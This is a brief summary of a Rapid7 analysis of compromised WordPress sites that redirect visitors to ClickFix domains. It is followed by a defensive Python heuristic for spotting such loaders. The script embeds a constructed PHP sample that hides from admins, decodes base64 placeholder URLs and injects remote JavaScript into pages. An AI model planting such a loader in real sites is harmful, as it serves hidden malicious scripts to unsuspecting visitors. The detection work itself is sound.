The analysis uncovered malicious activity involving compromised WordPress websites that were redirecting users to ClickFix domains for ad injection and potential data collection. A loader script was found on an Australian pharmacy site designed to inject JavaScript from remote servers when a user is not logged in as an admin. The script attempted to fetch code from several encoded endpoints, one of which was successfully retrieved from goveanrs.org. This method allowed the attackers to hide their activity from administrators and potentially spread malware or ads without detection. Additionally, compromised sites were found hosting ClickFix JavaScript directly on their servers via a specific AJAX endpoint. No common vulnerabilities in plugins or WordPress versions were identified across affected sites, suggesting that the compromise may have occurred through various means such as weak passwords, outdated software, or other security lapses.
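As an added illustration, not code from the Rapid7 analysis, the following Python heuristic looks for the loader pattern described above in a PHP file: a negated admin check paired with encoded remote endpoints. The PHP sample is constructed; the check function name, the base64 encoding and the domains are assumptions.

```python
import base64
import re

# Constructed sample, not the loader from the article: PHP that fires only for
# non-admin visitors and tries several base64-encoded fallback endpoints. The
# check function name, the base64 encoding and the domains are assumptions.
_ENDPOINTS = [b"https://loader.example.invalid/js/init.js",
              b"https://cdn.example.invalid/a.js"]
_ENC = ", ".join("'%s'" % base64.b64encode(u).decode() for u in _ENDPOINTS)
SAMPLE_PHP = (
    "<?php\n"
    "if (!current_user_can('administrator')) {\n"
    "    foreach (array(" + _ENC + ") as $e) {\n"
    "        $js = @file_get_contents(base64_decode($e));\n"
    "        if ($js) { echo '<script>' . $js . '</script>'; break; }\n"
    "    }\n"
    "}\n"
)

# Heuristic 1: a negated WordPress privilege or login check (hides from admins).
ADMIN_GATE = re.compile(r"!\s*(?:current_user_can|is_admin|is_user_logged_in)\s*\(")
# Heuristic 2: quoted base64-looking literals that decode to http(s) URLs.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")
URL = re.compile(r"^https?://([^/'\"\s]+)")


def decoded_urls(text):
    """Return (literal, decoded_url) pairs for base64 literals that decode to URLs."""
    hits = []
    for m in B64_LITERAL.finditer(text):
        try:
            dec = base64.b64decode(m.group(1), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 or not text: skip
        if URL.match(dec):
            hits.append((m.group(1), dec))
    return hits


def assess(text):
    """Flag a file as suspicious when an admin gate and encoded remote URLs co-occur."""
    urls = decoded_urls(text)
    gated = bool(ADMIN_GATE.search(text))
    domains = sorted({URL.match(u).group(1) for _, u in urls})
    return {"admin_gated": gated,
            "remote_domains": domains,
            "suspicious": gated and bool(urls)}


if __name__ == "__main__":
    print(assess(SAMPLE_PHP))
```

Run it over theme and plugin files as a triage filter; a hit is a lead to review by hand, since the same constructs also appear in legitimate code.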
Read the full article at Rapid7 Blog